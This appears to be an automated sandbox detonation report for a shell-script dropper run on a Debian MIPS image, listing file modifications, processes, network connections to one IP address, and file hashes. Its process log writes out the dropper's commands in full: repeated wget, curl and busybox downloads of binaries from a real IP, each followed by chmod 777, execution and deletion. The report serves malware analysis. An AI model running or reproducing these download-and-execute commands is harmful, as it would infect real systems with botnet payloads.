| File opened for modification | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | /usr/bin/curl | N/A |
| File opened for modification | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | /usr/bin/curl | N/A |
Processes
/tmp/85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh
[/tmp/85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/chmod
[chmod 777 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
[./57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/rm
[rm 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/usr/bin/wget
[wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/chmod
[chmod 777 QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo
[./QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/rm
[rm QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/usr/bin/wget
[wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/chmod
[chmod 777 MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P
[./MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/rm
[rm MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/usr/bin/wget
[wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/chmod
[chmod 777 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw
[./7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/rm
[rm 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/usr/bin/wget
[wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/chmod
[chmod 777 mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5
[./mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/rm
[rm mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/usr/bin/wget
[wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/chmod
[chmod 777 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0
[./3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/rm
[rm 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/usr/bin/wget
[wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/chmod
[chmod 777 WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in
[./WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/rm
[rm WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/usr/bin/wget
[wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/chmod
[chmod 777 DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR
[./DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/rm
[rm DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/usr/bin/wget
[wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/chmod
[chmod 777 Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss
[./Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/rm
[rm Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/usr/bin/wget
[wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/chmod
[chmod 777 Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw
[./Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/rm
[rm Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/usr/bin/wget
[wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/chmod
[chmod 777 rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE
[./rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/rm
[rm rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/usr/bin/wget
[wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/chmod
[chmod 777 aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao
[./aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/rm
[rm aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/usr/bin/wget
[wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/chmod
[chmod 777 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf
[./8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/rm
[rm 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/usr/bin/wget
[wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/chmod
[chmod 777 xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5
[./xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/rm
[rm xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/usr/bin/wget
[wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/chmod
[chmod 777 aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao
[./aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/rm
[rm aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/usr/bin/wget
[wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/chmod
[chmod 777 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf
[./8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/rm
[rm 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/usr/bin/wget
[wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/chmod
[chmod 777 xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5
[./xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/rm
[rm xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/usr/bin/wget
[wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/chmod
[chmod 777 WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in
[./WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/rm
[rm WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/usr/bin/wget
[wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/chmod
[chmod 777 DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR
[./DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/rm
[rm DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/usr/bin/wget
[wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/chmod
[chmod 777 Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss
[./Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/rm
[rm Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/usr/bin/wget
[wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/chmod
[chmod 777 Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw
[./Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/rm
[rm Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/usr/bin/wget
[wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/chmod
[chmod 777 rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE
[./rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/rm
[rm rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/usr/bin/wget
[wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/chmod
[chmod 777 mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5
[./mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/rm
[rm mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/usr/bin/wget
[wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/chmod
[chmod 777 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
[./57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/rm
[rm 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/usr/bin/wget
[wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/chmod
[chmod 777 QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo
[./QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/rm
[rm QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/usr/bin/wget
[wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/chmod
[chmod 777 MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P
[./MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/rm
[rm MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/usr/bin/wget
[wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/chmod
[chmod 777 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw
[./7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/rm
[rm 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/usr/bin/wget
[wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/chmod
[chmod 777 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0
[./3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/rm
[rm 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-21 01:07
Reported
2024-11-21 01:09
Platform
debian9-mipsel-20240226-en
Max time kernel
137s
Max time network
140s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
